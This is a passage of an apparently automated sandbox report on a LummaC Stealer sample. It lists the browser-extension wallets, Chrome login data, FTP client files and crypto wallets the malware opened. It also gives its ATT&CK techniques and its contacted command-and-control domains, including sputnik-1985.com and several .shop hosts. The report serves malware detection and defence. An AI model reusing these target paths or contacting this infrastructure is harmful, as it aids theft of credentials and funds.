                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: Yara matchFile source: 00000004.00000003.2820648610.000000000319D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6484, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6484, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		311
                Process Injection                		21
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Screen Capture                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		311
                Process Injection                		LSASS Memory21
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin Shares41
                Data from Local System                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS1
                File and Directory Discovery                		Distributed Component Object Model2
                Clipboard Data                		114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets32
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                NjFiIQNSid.exe46%VirustotalBrowse
                NjFiIQNSid.exe37%ReversingLabs
                NjFiIQNSid.exe100%AviraTR/Crypt.XPACK.Gen
                NjFiIQNSid.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://community.fastly.steamstatic.i0%Avira URL Cloudsafe
                https://community.fastly.steamstatiy0%Avira URL Cloudsafe
                http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.htmllimiterEvent.stop:0%Avira URL Cloudsafe
                https://login.s0%Avira URL Cloudsafe
                http://schemas.pocketsoap.com/rss/myDescModule/invalid0%Avira URL Cloudsafe
                https://sputnik-1985.com/apitvo0%Avira URL Cloudsafe
                http://web.resource.org/cc/input0%Avira URL Cloudsafe
                https://sputnik-1985.com/api0%Avira URL Cloudsafe
                http://postneo.com/icbm/idna:0%Avira URL Cloudsafe
                https://sputnik-1985.com/0%Avira URL Cloudsafe
                https://sputnik-1985.com/8=lw0%Avira URL Cloudsafe
                https://sputnik-1985.com/apiobH0%Avira URL Cloudsafe
                http://www.opengis.net/gmlhttp://xmlns.com/foaf/0.1/integer0%Avira URL Cloudsafe
                https://community.fas0%Avira URL Cloudsafe
                https://community.fastly.steamstatY0%Avira URL Cloudsafe
                http://backend.userland.com/creativeCommonsRssModulehttp://madskills.com/public/xml/rss/module/pingb0%Avira URL Cloudsafe
                https://sputnik-1985.com/-0%Avira URL Cloudsafe
                https://sputnik-1985.com/api30%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		104.102.49.254
                		truefalse
                  		high
                  sputnik-1985.com
                  		104.21.112.1
                  		truetrue
                    		unknown
                    bootstringjl.click
                    		unknown
                    		unknowntrue
                      		unknown
                      cloudewahsj.shop
                      		unknown
                      		unknownfalse
                        		high
                        noisycuttej.shop
                        		unknown
                        		unknowntrue
                          		unknown
                          nearycrepso.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            framekgirus.shop
                            		unknown
                            		unknowntrue
                              		unknown
                              rabidcowse.shop
                              		unknown
                              		unknowntrue
                                		unknown
                                wholersorie.shop
                                		unknown
                                		unknowntrue
                                  		unknown
                                  tirepublicerj.shop
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    abruptyopsn.shop
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://sputnik-1985.com/apitrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://steamcommunity.com/profiles/76561199724331900false
                                        		high
                                        rabidcowse.shopfalse
                                          		high
                                          cloudewahsj.shopfalse
                                            		high
                                            nearycrepso.shopfalse
                                              		high
                                              abruptyopsn.shopfalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://community.fastly.steamstatic.iBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://player.vimeo.comBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://community.fastly.steamstatic.com/publi)BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://steamcommunity.com/?subsection=broadcastsBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWT9BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.htmllimiterEvent.stop:NjFiIQNSid.exefalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.gstatic.cn/recaptcha/BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://login.sBitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://community.fastly.steamstatiyBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://web.resource.org/cc/inputNjFiIQNSid.exefalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://sputnik-1985.com/apitvoBitLockerToGo.exe, 00000004.00000003.2857839635.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859511619.00000000031A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.valvesoftware.com/legal.htmBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.youtube.comBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.comBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.pocketsoap.com/rss/myDescModule/invalidNjFiIQNSid.exefalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&aBitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englBitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://s.ytimg.com;BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/css/BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://podlove.org/simple-chaptersillegalNjFiIQNSid.exefalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://steam.tv/BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://postneo.com/icbm/idna:NjFiIQNSid.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://community.fastly.steamstatic.com/public/shared/cssKBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://sketchfab.comBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://lv.queniujq.cnBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859436926.0000000003197000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.0000000003194000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.0000000003194000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.youtube.com/BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
